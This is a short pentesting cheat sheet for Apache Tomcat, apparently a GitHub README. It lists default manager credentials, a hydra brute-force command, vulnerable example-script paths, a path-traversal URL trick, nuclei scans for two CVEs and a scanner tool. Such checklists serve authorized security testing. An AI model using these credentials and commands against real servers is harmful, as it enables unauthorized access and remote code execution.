Apache-Tomcat-Pentesting
Apache-Tomcat-Pentesting copied to clipboard
Published
20 hours ago •
kh4sh3i
kh4sh3i
Apache Tomcat exploit and Pentesting guide for penetration tester
Apache Tomcat
Apache Tomcat exploit and Pentesting guide for penetration tester
Default credentials
The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But this path is protected by basic HTTP auth, the most common credentials are:
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
Bruteforce
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
vulnerability
Example Scripts Information Leakage
The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection.
/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp
Path Traversal (..;/)
http://www.vulnerable.com/;param=value/manager/html
Apache Tomcat Snoop Servlet Remote Information Disclosure
https://target:ip/examples/jsp/snp/snoop.jsp
Apache Tomcat - Cross-Site Scripting
nuclei -u target -t CVE-2019-0221.yaml
Apache Tomcat Remote Command Execution
nuclei -u target -t CVE-2020-9484.yaml
tomcat scanning tools
sudo python3 -m pip install apachetomcatscanner
apachetomcatscanner -tt target_ip -tp port --no-check-certificate
kh4sh3i